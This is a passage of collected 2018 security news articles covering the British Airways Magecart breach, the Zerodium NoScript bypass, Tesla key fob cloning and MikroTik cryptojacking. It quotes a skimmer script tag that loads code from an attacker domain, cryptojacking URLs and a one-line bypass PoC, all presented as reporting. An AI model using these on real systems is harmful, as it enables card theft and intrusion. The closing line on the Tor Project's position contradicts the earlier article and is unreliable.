The researcher has published videos showing how the attack works against each browser. Proof-of-concept (PoC) code has also been made available for Microsoft Edge.

 


Google Case Set to Examine if EU Data Rules Extend Globally

12.9.2018 securityweek Privacy

Google is going to Europe's top court in its legal fight against an order requiring it to extend "right to be forgotten" rules to its search engines globally.

The technology giant is set for a showdown at the European Union Court of Justice in Luxembourg on Tuesday with France's data privacy regulator over an order to remove search results worldwide upon request.

The dispute pits data privacy concerns against the public's right to know, while also raising thorny questions about how to enforce differing legal jurisdictions when it comes to the borderless internet.

The two sides will be seeking clarification on a 2015 decision by the French regulator requiring Google to remove results for all its search engines on request, and not just on European country sites like google.fr.

Google declined to comment ahead of the hearing. Its general counsel, Kent Walker, said in a blog post in November that complying with the order "would encourage other countries, including less democratic regimes, to try to impose their values on citizens in the rest of the world."

"These cases represent a serious assault on the public's right to access lawful information," he added.

In an unusual move, the court has allowed a collection of press freedom, free speech and civil rights groups to submit their opinions on the case. These groups agree with Google that forcing internet companies to remove website links threatens access to information and could pave the way for censorship by more authoritarian regimes such as China, Russia and Saudi Arabia.

The court's ruling is expected within months. It will be preceded by an opinion from the court's advocate general.

The case stems from a landmark 2014 Court of Justice ruling that people have the right to control what appears when their name is searched online. That decision forced Google to delete links to outdated or embarrassing personal information that popped up in searches of their names.

Authorities are now starting to worry about the risk that internet users can easily turn to proxy servers and virtual private networks to spoof their location, allowing them to dig up the blocked search results.

Google said in its most recent transparency report that it has received requests to delete about 2.74 million web links since the ruling, and has deleted about 44 percent of them.

Not all requests are waved through. In a related case that will also be heard Tuesday, the EU court will be asked to weigh in on a request by four people in France who want their search results to be purged of any information about their political beliefs and criminal records, without taking into account public interest. Google had rejected their request, which was ultimately referred to the ECJ.


Zerodium Discloses Flaw That Allows Code Execution in Tor Browser

12.9.2018 securityweek Vulnerebility

Exploit acquisition firm Zerodium has disclosed a NoScript vulnerability that can be exploited to execute arbitrary JavaScript code in the Tor Browser even if the maximum security level is used.

Zerodium disclosed the flaw and provided instructions on how it can be reproduced in a single message posted to Twitter on Monday. The recently released Tor Browser 8 is not affected.

While the tweet describes the issue as a vulnerability or backdoor in the Tor Browser, the flaw actually impacts NoScript, a popular Firefox extension designed to protect users against malicious scripts by allowing JavaScript, Java, and Flash plugins to be executed only on trusted websites. The Tor Browser is based on Firefox and it includes NoScript by default.

Zerodium discloses Tor Browser zero-day exploit

Giorgio Maone, the Italian developer who created NoScript, patched the vulnerability in roughly two hours with the release of version 5.1.8.7. Maone noted that only the “Classic” branch of NoScript 5 is impacted.

The developer explained that the bug exists due to a “work-around for NoScript blocking the in-browser JSON viewer.” He also noted that the vulnerability was introduced in May 2017 with the release of NoScript 5.0.4.

Contacted by SecurityWeek, Tor Project representatives highlighted that this is not a Tor Browser zero-day vulnerability.

“This was a bug in NoScript and not a zero-day exploit of Tor Browser that could circumvent its privacy protections. For bypassing Tor, a real browser exploit would still be needed,” the Tor Project explained.

Chaouki Bekrar, the CEO of Zerodium, told SecurityWeek that the exploit basically circumvents the protection provided by NoScript, even if the Tor Browser is set to the “Safest” security level.

“If a user sets his Tor browser security level to ‘Safest’ to block JavaScript from all websites (e.g. to prevent browser exploits or data gathering), the exploit would allow a website or a hidden service to bypass all NoScript restrictions and execute any JavaScript code despite the maximum security level being used, making it totally ineffective,” Bekrar explained.

Bekrar said his company acquired the vulnerability as a zero-day “many months ago” and shared it with its government customers. He claims Zerodium has acquired – including as part of a time-limited $1 million bug bounty program – what he describes as “high-end Tor exploits.” The company’s customers have allegedly used these exploits to “fight crime and child abuse, and make the world a better and safer place for all.”

Asked if he is concerned that the vulnerability may be exploited for malicious purposes now that it has been disclosed by Zerodium, Bekrar highlighted that version 8 of Tor Browser is not impacted and that it’s highly recommended that users upgrade to the newest release.


Trend Micro Admits That Its Mac Apps Collect User Data
12.9.2018 securityweek Privacy

Trend Micro on Monday confirmed that some of its applications for Mac collect browser history and send it to the security firm’s servers.

Recent reports revealed that so-called security applications for Mac that are being distributed through Apple’s App Store collected and exfiltrated users’ browsing histories along with some other sensitive information (such as lists of installed apps).

The initial reports focused on Adware Doctor, a $4.99 application that would gather Safari, Chrome, and Firefox browsing history, the list of running processes, and a list of downloaded software. The program was observed sending the harvested data to a server located in China.

Among the other applications that engaged in the collection of browsing history, researchers mentioned Dr. Antivirus and Dr. Cleaner, two programs developed by security software provider Trend Micro.

In a statement regarding these allegations, the company confirmed not only that the two applications collected user data, but also that other Mac apps developed by the company did the same, including Dr Cleaner Pro, Dr. Unarchiver, Dr. Battery, and Duplicate Finder.

The data collection practice, the company says, only targeted “a small snapshot of the browser history on a one-time basis.” Specifically, only the browsing history for the 24 hours prior to the installation were targeted.

“This was a one-time data collection, done for security purposes (to analyze whether a user had recently encountered adware or other threats, and thus to improve the product & service),” Trend Micro claims.

The security firm also points out that users were informed on the collection and use of browser history data, both in the applicable EULAs and at installation, when the user was also prompted to accept the data collection.

The security firm also notes that the browser history data was uploaded to a U.S.-based server hosted by AWS and managed/controlled by Trend Micro.

All of the offending applications have been already stripped off the browser history collection capabilities, Trend Micro also says. In addition, the company also claims to have permanently dumped all legacy logs from the US-based AWS servers, including the logs of browser histories that the users permitted at installation (and which was only being held for 3 months).

According to Trend Micro, the presence of the same data collection capabilities across a number of its applications was the result of the use of common code libraries.

“We have learned that browser collection functionality was designed in common across a few of our applications and then deployed the same way for both security-oriented as well as the non-security oriented apps such as the ones in discussion. This has been corrected,” the company said.


British Airways, Another Victim of Ongoing Magecart Attacks
12.9.2018 securityweek Incindent

The data breach that British Airways said last week to have impacted 380,000 of its users was caused by an attack from Magecart, a threat group known for the use of web-based card skimmers.

The incident, the airline revealed on September 6, resulted in cybercriminals accessing the personal and financial details of customers who made bookings between August 21 and September 5, either via the company’s website or their mobile app.

On Friday, chief executive Alex Cruz told BBC the airline experienced “a very sophisticated, malicious, criminal attack” on their website. The breach resulted in customer names, postal addresses, email addresses and credit card information being stolen.

British Airways says the breach of customer data spanned a total of 15 days, but the attackers likely had access to the company’s systems before that, RiskIQ reveals. A paid certificate from Comodo used in this attack was issued on August 15, suggesting the miscreants “likely had access to the British Airways site before the reported start date of the attack on August 21st,” the security firm says.

RiskIQ, which has been tracking Magecart attacks since 2015, and which found a couple of months ago that the threat group also stole the information of Ticketmaster UK customers, said today they discovered how the data of British Airways’ customers was stolen.

The culprit was a modified version of the Modernizr JavaScript library that was loaded from the baggage claim information page of the British Airways website. Modified on August 21, the file contained 22 lines of JavaScript, and was long enough to steal the information of 380,000 users.

The script would extract user’s name and information from the payment form as soon as they hit the button to submit their payment on the compromised British Airways site. The data was sent to the attackers’ server.

“This attack is a simple but highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer which grabbed forms indiscriminately. This particular skimmer is very much attuned to how British Airways’ payment page is set up, which tells us that the attackers carefully considered how to target this site instead of blindly injecting the regular Magecart skimmer,” RiskIQ says.

The attackers’ infrastructure was also specifically tailored for this attack, targeting scripts that would blend in with normal payment processing to stay under the radar. The attackers set up the domain baways.com, hosted on 89.47.162.248, an IP located in Romania but part of a VPS provider based in Lithuania.

What made it possible to target the users of British Airways’ mobile app as well, the security firm reveals, was the fact that the software loads a series of resources from the airline’s website, including the same compromised Modernizr JavaScript library. The hackers, however, also “put in the touchend callback in the skimmer to make it work for mobile visitors as well,” RiskIQ points out.

“Magecart set up custom, targeted infrastructure to blend in with the British Airways website specifically and avoid detection for as long as possible. While we can never know how much reach the attackers had on the British Airways servers, the fact that they were able to modify a resource for the site tells us the access was substantial, and the fact they likely had access long before the attack even started is a stark reminder about the vulnerability of web-facing assets,” RiskIQ concludes.

Magecart is an active threat that has been continuously refining tactics and targets to maximize returns. As part of the Ticketmaster attack, they targeted third-party provider Inbenta, but switched to targeting a specific brand in the British Airways incident, specifically tailoring their attack to match the site’s functionality. The threat group is expected to continue to evolve, the security firm says.

[Update]

Comodo, which has already revoked the SSL certificate for baways.com, says it followed all industry standards and Baseline Requirements from the CA/Browser Forum when issuing the certificate in mid-August.

“Domain Validated (DV) certificates are issued once the requester can prove that they own the domain requesting the certificate,” a Comodo CA spokesperson told SecurityWeek in an emailed comment.

“While Certificate Authorities (CAs) can and must authenticate certificate requesters according to their validation level (EV, OV, or DV), they are not able to discern the intention of the certificate requester in advance of real-world use,” the spokesperson said.


OpenSSL 1.1.1 Released With TLS 1.3, Security Improvements
12.9.2018 securityweek Security

The OpenSSL Project on Tuesday announced the release of OpenSSL 1.1.1, the new Long Term Support (LTS) version of the cryptographic software library.

According to the organization, the most important new feature in OpenSSL 1.1.1 is TLS 1.3, which the Internet Engineering Task Force (IETF) published last month as RFC 8446.

Since OpenSSL 1.1.1 is API and ABI compliant with OpenSSL 1.1.0, most applications that work with the older version can take advantage of the benefits provided by TLS 1.3 simply by updating to the newer version.

TLS 1.3 has numerous benefits, but the ones highlighted by the OpenSSL Project are improved connection times, the ability of clients to immediately start sending encrypted data to servers, and improved security due to the removal of outdated cryptographic algorithms.

Other noteworthy changes in OpenSSL 1.1.1 include a complete rewrite of the random number generator, support for several new cryptographic algorithms, security improvements designed to mitigate side-channel attacks, support for the Maximum Fragment Length TLS extension, and a new STORE module that implements a uniform and URI-based reader of stores that contain certificates, keys, CRLs and other objects.

The new crypto algorithms include SHA3, SHA512/224 and SHA512/256, EdDSA, X448, multi-prime RSA, SM2, SM3, SM4, SipHash and ARIA.

“OpenSSL 1.1.1 has been a huge team effort with nearly 5000 commits having been made from over 200 individual contributors since the release of OpenSSL 1.1.0,” OpenSSL developer Matt Caswell wrote in a blog post. “These statistics just illustrate the amazing vitality and diversity of the OpenSSL community. The contributions didn’t just come in the form of commits though. There has been a great deal of interest in this new version so thanks needs to be extended to the large number of users who have downloaded the beta releases to test them out and report bugs.”

Since OpenSSL 1.1.1 is the new LTS release, it will receive support for at least five years. The 1.1.0 release will receive support for one year starting today, and the 1.0.2 branch, which until now was the LTS release, will receive full support until the end of 2018 and then only security updates until the end of next year.


SAP Patches Critical Vulnerability in Business Client
12.9.2018 securityweek
Vulnerebility

SAP today released its September 2018 set of patches to address a total of 14 vulnerabilities in its products, including a critical bug in SAP Business Client.

Featuring a CVSS score of 9.8 and rated Hot News, the vulnerability impacts the browser control Chromium delivered with SAP Business Client. The issue was initially addressed on April 2018 Patch Day, but SAP decided to update the Security Note today.

Of the remaining 13 Security Notes included in this month’s Security Patch Day, three were rated High severity, 9 Medium risk, and 1 Low severity.

Impacted SAP products include Business One, BEx Web Java Runtime Export Web Service, HANA, WebDynpro, NetWeaver AS Java, Hybris Commerce, Plant Connectivity, Adaptive Server Enterprise, HCM Fiori "People Profile" (GBX01HR), Mobile Platform, Enterprise Financial Services, and Business One Android application.

SAP also released 8 Support Package Notes this month, for a total of 22 Security Notes, ERPScan, a company that specializes in securing Oracle and SAP products, reveals. 4 of the notes were released over the course of the last month.

Missing Authorization Check was the most encountered type of vulnerability, followed by information disclosure, Cross-Site Scripting, and XML External Entity issues. SAP also addressed implementation flaws, denial of service, SQL injection, buffer overflow, and server side request forgery vulnerabilities.

The most important bugs closed in September (all featuring a CVSS Base Score of 8.8) include a Missing Authorization check vulnerability in SAP ECC Sales Support, an Information Disclosure vulnerability in Business One and HANA Installer, and a Missing XML Validation (XXE) vulnerability in BEx Web Java Runtime Export Web Service.

Another important bug was a denial of service vulnerability in SAP HANA, Extended Application Services Classic Model. Tracked as CVE-2018-2465, the flaw has a CVSS score of 7.5 and is considered High risk.

Discovered by Onapsis researchers, the flaw can be exploited by a remote, unauthenticated attacker through a large crafted request to a default API or to ODATA services present in a HANA XS system abusing the XML parsing, the company says.

“Even though a Denial Of Service attack is the easiest way to exploit this vulnerability, a more complex attack could lead to a potential remote code execution (RCE), that could lead to even worse scenarios for the affected users,” Sebastian Bortnik, Director Of Research for Onapsis, told SecurityWeek in an emailed comment.

A Cross-Site Scripting issue in NetWeaver AS Java Logon Application (versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40 and 7.50) can lead to defacements, user credentials compromises, or user impersonation, Onapsis, which also focuses on securing Oracle and SAP applications, explains.


Microsoft Patches Windows Zero-Day Disclosed via Twitter
12.9.2018 securityweek
Vulnerebility

Microsoft’s Patch Tuesday updates for September 2018 address over 60 vulnerabilities, including a zero-day disclosed by a researcher and exploited shortly after by a threat actor.

The actively exploited flaw, identified as CVE-2018-8440, was disclosed on August 27 by a researcher who uses the online moniker SandboxEscaper. The security hole was not reported to Microsoft before its existence was disclosed via Twitter as SandboxEscaper was apparently frustrated with the company’s vulnerability reporting process.

The privilege escalation vulnerability, which according to Microsoft exists when Windows improperly handles calls to the Advanced Local Procedure Call (ALPC) interface of the Task Scheduler, can be exploited by an authenticated attacker to execute code with elevated privileges.

ESET discovered that a newly uncovered group it tracks as PowerPool used a modified version of the public exploit in an attempt to deliver malware to a small number of users located in the United States, the United Kingdom, Germany, Ukraine, Chile, India, Russia, the Philippines and Poland.

Three other vulnerabilities patched by Microsoft on Tuesday were made public before fixes were released, but none of them have been exploited in the wild.

One of them, tracked as CVE-2018-8475 and rated critical, allows an attacker to execute arbitrary code by getting the targeted Windows user to execute a specially crafted image file.

“Microsoft provides no information on where this is public, but given the severity of the issue and the relative ease of exploitation, expect this one to find its way into exploit kits quickly,” Trend Micro’s Zero Day Initiative (ZDI) explained in a blog post discussing Patch Tuesday updates.

Another publicly disclosed critical flaw is CVE-2018-8457, which affects Microsoft’s web browsers and which can be exploited to execute arbitrary code by getting the target to access a malicious website.

The last publicly disclosed flaw is an “important” denial-of-service (DoS) issue affecting .NET Core, ASP.NET Core and the System.IO.Pipelines component.

A total of 17 vulnerabilities have been rated “critical” by Microsoft, including ones affecting Windows, web browsers, and the .NET framework.

Two interesting flaws are CVE-2018-0965 and CVE-2018-8439. They both affect Windows Hyper-V and they both allow an attacker with access to a guest virtual machine to execute code on the host operating system.

Adobe and SAP have also released Patch Tuesday updates. Adobe fixed 10 vulnerabilities in Flash Player and ColdFusion, while SAP addressed a total of 14 flaws across several of its products.


Romanian Court Rules Hacker Can be Extradited to US
12.9.2018 securityweek Crime

A Romanian court has ruled that a hacker known as Guccifer should be extradited to the U.S. to serve a 4½-year prison sentence.

The court in the central city of Alba Iulia ruled Monday that Romanian Marcel Lazar Lehel will be extradited after completing a seven-year sentence in Romania.

Guccifer gained global notoriety after he hacked the email accounts of U.S. officials including former Secretary of State Colin Powell and members of the Bush family.

He also claimed to have hacked the emails of Secretary of State Hillary Clinton, but prosecutors found no evidence of that. However, he was found to have hacked an email account of Sidney Blumenthal, a confidant of Clinton, in March 2013. The subsequent leak of Blumenthal's emails was the first time that outsiders became aware of Clinton's private "clintonemail.com" address, which she used to communicate with Blumenthal. It became part of the investigation into whether Clinton mishandled sensitive emails.

Lehel, 46, was sent to the U.S. in March 2016 and pleaded guilty to accessing the personal emails and social media accounts of some 100 U.S. citizens between 2012 and 2014 and releasing their private photographs and correspondence.

Among the Americans he hacked was "Sex and the City" author Candace Bushnell.

He was later sent back to Romania and is currently incarcerated in the city of Deva after he was sentenced for illegally accessing the email accounts of Romanian officials and public figures.

Monday's ruling can be appealed. Lehel previously said he wants to serve his U.S. prison sentence in Romania.


Researchers show how to clone Tesla S Key Fobs in a few seconds
12.9.2018 securityaffairs Hacking

Researchers demonstrated that it is possible to rapidly clone the wireless key fob of the expensive Tesla Model S and possibly other vehicles.
The team of experts COSIC research group at the KU Leuven University in Belgium has devised a new relay attack against the Passive Keyless Entry and Start (PKES) system that is used by many cars to unlock the doors and start the engine.

Passive keyless entry (PKE) operates automatically when the user is in proximity to the vehicle, it relies on a paired key fob.

We have already discussed relay attacks against PKES used by thieves to steal vehicles. Attackers use relaying messages between the vehicle and the key, to launch the attack they use a hacking device near the key and another one in the proximity of the car. The drawback of such kind of attacks is that the hacker can unlock the car and start the engine only while the legitimate key fob is in range.

A team from the COSIC research group at the KU Leuven university in Belgium has discovered a new attack method that can be used to clone key fobs in a few seconds and use the close to open and start a car everytime they want.

“During normal operation the car periodically advertises its identifier. The key will receive the car’s identifier, if it is the expected car identifier the key fob will reply, signaling it is ready to receive a challenge,” reads a blog post written by the experts.

“In the next step the car will transmit a random challenge to the key fob. The key fob computes a response and transmits it. After receiving the key fob’s response, the car must verify it before unlocking the doors. The same challenge response protocol is repeated to start the car.”

Tesla S key fob relay attack

The experts discovered several security weaknesses, the most worrisome one is the lack of mutual authentication, this means that an attacker with the knowledge of the vehicle’s identifier can get a response from the key fob that is broadcasted by the car.

Another severe security issue is that responses are computed using DST40 that is an outdated proprietary cipher that uses a 40-bit secret cryptographic key.

The new attacks technique devised by the experts is composed of the following four phases:

Phase 0: the adversary records one wake frame periodically transmitted by the car to learn the 2-byte car identifier.
Phase 1: the adversary can now impersonate the car and transmits two chosen 40-bit challenges to the key fob and records their respective 24-bit responses.
Phase 2: using the captured challenge response pairs and the TMTO table the 40-bit key can be recovered. The first pair is used to select the correct subset of keys and the second pair is used to find the real key among the approximately 216 candidate keys.
Phase 3: the adversary can now impersonate the key fob and thus unlock and start the car.

The attacker demonstrates that it is possible to use Proxmark 3 RFID analyzer tool from a distance of 1 meter. The distance can be increased to up to 8 meters using custom antennas and transmission hardware are used.

The experts successfully tested the attack on the PKES system used in the Tesla Model S, but highlighted that this PKES system is manufactured by Pektron and is used by many other car vendors (i.e. McLaren, Karma and Triumph).

Tesla has already fixed the problems with the help of the research team.

The experts reported the flaw to Tesla in August and the vendor fixed the problems with their help in the recent weeks.

Tesla rolled out improved cryptography for key fobs and introduced an optional feature called “PIN to Drive,” that requests a PIN to be the driver before the vehicle can be driven.


Adobe Patch Tuesday for September 2018 fixes 10 flaws in Flash Player and ColdFusion
12.9.2018 securityaffairs
Vulnerebility

Adobe Patch Tuesday updates for September 2018 address a total of 10 vulnerabilities in Flash Player and ColdFusion, the good news is that none is severe.
The Adobe Patch Tuesday updates for September 2018 addressed an important privilege escalation vulnerability (CVE-2018-15967) in Adobe Flash Player 30.0.0.154 and earlier versions. The successful exploitation of the flaw could lead to information disclosure.

“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address an important vulnerability in Adobe Flash Player 30.0.0.154 and earlier versions. Successful exploitation could lead to information disclosure.” reads the security advisory published by Adobe.

Version 31.0.0.108 addresses the CVE-2018-15967 flaw, the issue was rated as “important” with a priority rating of 2, which indicates that the likelihood of being exploited in attacks in the wild is very low.

The remaining nine vulnerabilities affected Adobe ColdFusion 6 of which are rated as critical (4 Deserialization of untrusted data, 1 Unrestricted file upload, and 1 issue related to the use of a component with a known vulnerability).

The security flaws impact ColdFusion 11, 2016 and 2018, and Adobe has issued update instructions for each version.

The critical flaws could be exploited for arbitrary code execution and arbitrary file overwrite, while an unrestricted file upload bug that can lead to code execution.

Other two flaws in ColdFusion have been rated “important,” an attacker could exploit them to create arbitrary folders and to obtain directory listings.

Adobe ColdFusion is also affected by a moderate severity information disclosure vulnerability that was introduced by the use of a component with a known flaw.


MageCart crime gang is behind the British Airways data breach
11.9.2018 securityaffairs Crime

An investigation conducted by researchers at RiskIQ revealed that the responsible of the British Airways data breach is a crime gang tracked as MageCart.
The responsible of the recently disclosed British Airways data breach is a crime gang tracked as MageCart. The group has been active since at least 2015 and compromised many e-commerce websites to steal payment card and other sensitive data.

The group injects a skimmer script in the target websites to siphon payment card data, once the attackers succeed in compromising a site, it will add an embedded piece of Javascript to the HTML template. Below an example script dubbed MagentoCore.

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>
This script records keystrokes from customers and sends them to a server controlled by the attacker.

Typically hackers attempt to compromise third-party features that could allow them to access a large number of websites.

According to the security firm RiskIQ, the MageCart group carried out a targeted attack against the British Airways and used a customized version of the script to remain under the radar.

The hackers used a dedicated infrastructure for this specific attack against the airline.

“This attack is a simple but highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer which grabbed forms indiscriminately. This particular skimmer is very much attuned to how British Airway’s payment page is set up, which tells us that the attackers carefully considered how to target this site instead of blindly injecting the regular Magecart skimmer.” reads the analysis published by RiskIQ.

“The infrastructure used in this attack was set up only with British Airways in mind and purposely targeted scripts that would blend in with normal payment processing to avoid detection. We saw proof of this on the domain name baways.com as well as the drop server path. “

Experts analyzed all the scripts loaded by the website and searched for any evidence of recent changes.

The expert noticed some changes in the Modernizr JavaScript library, attackers added some lines of code at the bottom to avoid causing problems to the script. The JavaScript library was modified on August 21, 20:49 GMT.

The malicious script was loaded from the baggage claim information page on the British Airways website, the code added by the attackers allowed Modernizr to send payment information from the customer to the attacker’s server.

British Airways script

The script allowed the attacker to steal users’ data from both the website and the mobile app.

The data stolen from the British Airways was sent in the form of JSON to a server hosted on baways.com that resembles the legitimate domain used by the airline.

The attackers purchased an SSL certificate from Comodo to avoid raising suspicion.

“The domain was hosted on 89.47.162.248 which is located in Romania and is, in fact, part of a VPS provider named Time4VPS based in Lithuania. The actors also loaded the server with an SSL certificate. Interestingly, they decided to go with a paid certificate from Comodo instead of a free LetsEncrypt certificate, likely to make it appear like a legitimate server:” continues RiskIQ.

At the time it is still unclear how MageCart managed to inject the malicious code in the British Airways website.

“As we’ve seen in this attack, Magecart set up custom, targeted infrastructure to blend in with the British Airways website specifically and avoid detection for as long as possible. While we can never know how much reach the attackers had on the British Airways servers, the fact that they were able to modify a resource for the site tells us the access was substantial, and the fact they likely had access long before the attack even started is a stark reminder about the vulnerability of web-facing assets.” concludes RiskIQ.


Chinese LuckyMouse APT has been using a digitally signed network filtering driver in recent attacks
11.9.2018 securityaffairs APT

Security experts observed the LuckyMouse APT group using a digitally signed 32- and 64-bit network filtering driver NDISProxy in recent attacks.
Security experts from Kaspersky have observed the LuckyMouse APT group (aka Emissary Panda, APT27 and Threat Group 3390) using a digitally signed 32- and 64-bit network filtering driver NDISProxy in recent attacks.

The APT group has been active since at least 2010, the crew targeted U.S. defense contractors and financial services firms worldwide.

In March 2018, security experts at Kaspersky Lab have observed an attack powered by the Chinese APT group, the experts speculate the campaign was started in the fall of 2017. The attack hit a national data center in an unnamed country in Central Asia, according to Kaspersky, the hackers were preparing a watering hole attack. The hackers attempted to inject malicious JavaScript code into the government websites connected to the data center.

Over the past months, the group used the network filtering driver NDISProxy to inject a previously unknown Trojan into the lsass.exe system process memory.

Kaspersky reported that the driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, experts immediately notified it to the firm.

“Since March 2018 we have discovered several infections where a previously unknown Trojan was injected into the lsass.exe system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy.” reads the analysis published by Kaspersky.

“Interestingly, this driver is signed with a digital certificate that belongs to Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT.”

The cyberespionage campaign analyzed by Kaspersky targeted Middle Asian government entities immediately prior to the Central Asian high-level meeting. Attackers show a specific interest in the regional political agenda.

The malware is composed of the following three modules:

A custom C++ installer that decrypts and drops the driver file in the corresponding system directory then creates a Windows autorun service to obtain driver persistence and adds the encrypted in-memory Trojan to the system registry.
A network filtering driver (NDISProxy) that decrypts and injects the Trojan into memory and filters port 3389 (Remote Desktop Protocol, RDP) traffic in order to insert the Trojan’s C2 communications into it.
The final payload is written in C++, it is a Trojan acting as HTTPS server that works together with the driver. It waits passively for communications from its C2, with two possible communication channels via ports 3389 and 443.
These modules allow lateral movements of the threat but don’t allow them to communicate with an external Command and Control infrastructure if the new infected host only has a LAN IP. The operators leveraged an Earthworm SOCKS tunneler to connect the LAN of the infected host to the external C2. The modules also used the Scanline network scanner to find file shares (port 135, Server Message Block, SMB) used to spread malware with administrative passwords, compromised with keyloggers.

LuckyMouse filtering driver

The malware is distributed through already compromised networks instead of leveraging spear-phishing messages.

The dropper can install both 32-bit and 64-bit drivers, depending on the target, and keeps track of all the installation process.

The network filtering driver NDISProxy inject a RAT that can execute common tasks into the compromised system, including running commands and downloading/uploading files.

The Trojan is used by attackers to harvest data from compromised hosts, to make lateral movements and for establishing the connection to C&C through SOCKS tunnels.

“This campaign appears to demonstrate once again LuckyMouse’s interest in Central Asia and the political agenda surrounding the Shanghai Cooperation Organization.” concludes Kaspersky.

Further details including IoCs are reported in the analysis published by the experts.


Other 3,700 MikroTik Routers compromised in cryptoJacking campaigns
11.9.2018 securityaffairs Hacking

Thousands of unpatched MikroTik Routers are involved in new cryptocurrency mining campaigns.
The exploit code for the CVE-2018-14847 vulnerabilities is becoming a commodity in the hacking underground, just after its disclosure crooks started using it to compromise MikroTik routers. Thousands of unpatched devices are mining for cryptocurrency at the moment.

Earlier August, experts uncovered a massive crypto jacking campaign that was targeting MikroTik routers to inject a Coinhive cryptocurrency mining script in the web traffic.

The campaign started in Brazil, but it is rapidly expanded to other countries targeting MikroTik routers all over the world, over 200,000 devices were compromised.

Even if the vendor released a security fix that addresses the flaw in April, the number of not updated routers is still very high.

Last week. experts from the security firm Qihoo 360 Netlab discovered more than 7,500 MikroTik routers that have been compromised to enable Socks4 proxy maliciously, allowing attackers to hijack the traffic of the hacked devices.

The researchers scanned the Internet for vulnerable devices, they found more than 5,000K devices with open TCP/8291 port, and 1,200k of them are Mikrotik devices, within which 370k (30.83%) are CVE-2018-14847 vulnerable.

Summarizing, more than 370,000 of 1.2 million MikroTik routers are still vulnerable to the CVE-2018-14847 exploit because owners have not updated them.

Most of the vulnerable devices are located in Brazil, Russia, and Indonesia.

Now the researcher Troy Mursch noticed that the infected MikroTik routers from the latest campaign open a websockets tunnel to a web browser mining script.

“According to the researcher, the malware increases the CPU activity of an infected MikroTik router to about 80% and maintain it at this level.” reads a blog post published by BleepingComputer.

“This gives room for other tasks to run and mine for cryptocurrency at the same time, in the hope of keeping the activity hidden from the user.”

Bad Packets Report
@bad_packets
· Sep 10, 2018
🚨 CRYPTOJACKING MALWARE DETECTED 🚨
URL: https://play.feesocrald[.]com/app.js
Opens websocket connections to: https://s*.soodatmish[.]com/@urlscanio archive: https://urlscan.io/responses/3cfaacb2e8ee3e7cc5685deddfed7e34bf7595015307fee64dd3c196c1d4ed93/ …

Currently found on 3,700+ compromised MikroTik routers: https://www.shodan.io/search?query=html%3A%22https%3A%2F%2Fplay.feesocrald.com%2Fapp.js%22 … pic.twitter.com/ykDxayszM5

View image on TwitterView image on Twitter

View image on TwitterView image on Twitter

Bad Packets Report
@bad_packets
Example infected #MikroTik router: http://187.45.50[.]35:8080
CPU usage of client throttled to ~80% pic.twitter.com/b7HOrEz6Tg

3:49 AM - Sep 10, 2018

4
See Bad Packets Report's other Tweets
Twitter Ads info and privacy
The expert found 3,734 devices by querying Shodan for MikroTik routers running the mining tool, and the number is growing.

Most of the routers compromised in this campaign are located in Brazil (2,612) and Argentina (480).

shodan MikroTik cryptojacking

Earlier August the researcher who goes online with the Twitter handle MalwareHunterBR uncovered a massive cryptojacking campaign that targeted MikroTik routers. The hackers aimed to change the configuration of the devices to inject a Coinhive cryptocurrency mining script in the users’ web traffic.

View image on TwitterView image on TwitterView image on Twitter

MalwareHunterBR
@MalwareHunterBR
another mass exploitation against @mikrotik_com devices (https://github.com/mrmtwoj/0day-mikrotik …)
hxxp://170.79.26.28/
CoinHive.Anonymous('hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3', #coinhive

1:31 PM - Jul 30, 2018
62
53 people are talking about this
Twitter Ads info and privacy
According to Trustwave the hackers were exploiting a zero-day flaw in the MikroTik routers to inject a copy of the Coinhive library in the traffic passing through the MikroTik routers.


Zerodium disclose exploit for NoScript bug in version 7 of Tor Browser
11.9.2018 securityaffairs
Exploit

Zero-day broker Zerodium has disclosed a NoScript vulnerability that could be exploited by attackers to execute arbitrary JavaScript code in the Tor Browser.

NoScript is a popular Firefox extension that protects users against malicious scripts, it only allows the execution of JavaScript, Java, and Flash plugins on trusted websites

Bug broker Zerodium has discovered a NoScript vulnerability that could be exploited to execute arbitrary JavaScript code in the Tor Browser even if the maximum level is used. The exploit bypasses the protection implemented by NoScript.

The company also provided instruction to exploit the flaw in the following Twitter message:

Zerodium

@Zerodium
Advisory: Tor Browser 7.x has a serious vuln/bugdoor leading to full bypass of Tor / NoScript 'Safest' security level (supposed to block all JS).
PoC: Set the Content-Type of your html/js page to "text/html;/json" and enjoy full JS pwnage. Newly released Tor 8.x is Not affected.

2:23 PM - Sep 10, 2018
1,043
921 people are talking about this
Twitter Ads info and privacy
Security researcher @x0rz also posted a proof of concept script to show that is very easy to exploit the flaw.

x0rz
@x0rz
Very easy to reproduce the Zerodium Tor Browser 7.x NoScript bypass vulnerability https://gist.github.com/x0rz/8198e8e22b1f70fddb9c815c1232b795 … #TorBrowser #vulnerability

4:10 PM - Sep 10, 2018
671
452 people are talking about this
Twitter Ads info and privacy
The latest version of the Tor Browser 8 is not affected, this means that users have to update their oldest versions as soon as possible.

The flaw resides in the NoScript Firefox extension and affects the Tor Browser that is based on Firefox.

The Italian hacker Giorgio Maone that developed the extension patched the bug in a couple of hours and addressed the problem with the release of the version 5.1.8.7.

Giorgio Maone
@ma1
· Sep 10, 2018
Replying to @ma1
Fixed in 5.1.8.7 "Classic": https://noscript.net/getit#classic

You may need to open about:config and set your xpinstall.signatures.required to false in order to install, since Mozilla doesn't support signing for "Classic" (legacy) add-ons anymore.

Giorgio Maone
@ma1
I said FIXED, guys :)
Get 5.1.8.7 here:http://noscript.net/getit#classic

4:27 PM - Sep 10, 2018
17
See Giorgio Maone's other Tweets
Twitter Ads info and privacy
Maone explained that only the “Classic” branch of NoScript 5 is impacted, according to the expert the flaw was introduced in May 2017 with the release of NoScript 5.0.4.

It exists due to a “work-around for NoScript blocking the in-browser JSON viewer.”

Tor Browser flaw

Tor Project team pointed out that this bug is a Tor Browser zero-day flaw, instead of a NoScript issue.

